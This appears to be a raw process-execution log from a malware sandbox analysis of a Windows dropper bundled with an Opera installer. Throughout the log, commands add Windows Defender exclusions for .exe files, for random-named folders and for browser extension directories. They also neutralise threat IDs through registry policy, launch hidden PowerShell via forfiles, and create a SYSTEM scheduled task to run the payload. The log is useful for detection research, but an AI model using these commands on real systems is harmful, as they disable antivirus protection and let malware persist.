C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2004
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.23 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x5530e8,0x5530f4,0x553100
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bozJhwcBWfTIuPvJGw" /SC once /ST 23:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe\" Lo /hgadidoWFv 757674 /S" /V1 /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bozJhwcBWfTIuPvJGw"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bozJhwcBWfTIuPvJGw
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bozJhwcBWfTIuPvJGw
C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe
C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe Lo /hgadidoWFv 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2064
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5072 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MovZspCuTpPaC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MovZspCuTpPaC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RXHKfDSqirfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RXHKfDSqirfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RYkefsiHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RYkefsiHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XImIZWEzCDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XImIZWEzCDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eAyGpXrokhrqbyVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eAyGpXrokhrqbyVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UvGNNHxtLtcCkoYu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UvGNNHxtLtcCkoYu\" /t REG_DWORD /d 0 /reg:64;"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MovZspCuTpPaC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MovZspCuTpPaC" /t REG_DWORD /d 0 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MovZspCuTpPaC" /t REG_DWORD /d 0 /reg:64
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RXHKfDSqirfU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RXHKfDSqirfU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RYkefsiHU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RYkefsiHU" /t REG_DWORD /d 0 /reg:64
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6040 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5600 /prefetch:8
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XImIZWEzCDUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XImIZWEzCDUn" /t REG_DWORD /d 0 /reg:64
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Windows\SysWOW64\reg.exe
